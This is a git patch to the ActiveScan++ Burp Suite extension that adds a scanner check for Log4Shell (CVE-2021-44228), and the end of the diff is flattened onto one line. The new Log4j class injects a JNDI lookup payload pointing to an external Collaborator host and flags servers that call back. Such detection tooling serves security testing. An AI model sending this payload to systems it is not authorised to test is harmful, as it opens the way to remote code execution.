From b485a0744140533d877ce244603502b42f9c6656 Mon Sep 17 00:00:00 2001
From: James Kettle
Date: Fri, 10 Dec 2021 10:44:51 +0000
Subject: [PATCH] Detect Log4Shell

---
 activeScan++.py | 22 +++++++++++++++++++++-
 1 file changed, 21 insertions(+), 1 deletion(-)

diff --git a/activeScan++.py b/activeScan++.py
index 7a46f95..665c7e4 100644
--- a/activeScan++.py
+++ b/activeScan++.py
@@ -31,7 +31,7 @@ except ImportError:
 print "Failed to load dependencies. This issue may be caused by using the unstable Jython 2.7 beta."
-VERSION = "1.0.22"
+VERSION = "1.0.23"
 FAST_MODE = False
 DEBUG = False
 callbacks = None
@@ -69,6 +69,7 @@ def registerExtenderCallbacks(self, this_callbacks):
 callbacks.registerScannerCheck(SimpleFuzz())
 callbacks.registerScannerCheck(EdgeSideInclude())
 if collab_enabled:
+ callbacks.registerScannerCheck(Log4j())
 callbacks.registerScannerCheck(Solr())
 callbacks.registerScannerCheck(doStruts_2017_12611_scan())
@@ -713,6 +714,25 @@ def consolidateDuplicateIssues(self, existingIssue, newIssue):
 return is_same_issue(existingIssue, newIssue)
+class Log4j(IScannerCheck):
+ def doActiveScan(self, basePair, insertionPoint):
+ collab = callbacks.createBurpCollaboratorClientContext()
+ attack = request(basePair, insertionPoint, "${jndi:ldap://"+collab.generatePayload(True)+"/a}")
+ interactions = collab.fetchAllCollaboratorInteractions()
+ if interactions:
+ return [CustomScanIssue(attack.getHttpService(), helpers.analyzeRequest(attack).getUrl(), [attack],
+ 'Log4Shell (CVE-2021-44228)',
+ "The application appears to be running a version of log4j vulnerable to RCE. ActiveScan++ sent a reference to an external file, and received a pingback from the server.

" + + "To investigate, use the manual collaborator client. It may be possible to escalate this vulnerability into RCE. Please refer to https://www.lunasec.io/docs/blog/log4j-zero-day/ for further information", + 'Firm', 'High')] + + def doPassiveScan(self, basePair): + return [] + + def consolidateDuplicateIssues(self, existingIssue, newIssue): + return is_same_issue(existingIssue, newIssue) + + class Solr(IScannerCheck): def doActiveScan(self, basePair, insertionPoint): collab = callbacks.createBurpCollaboratorClientContext()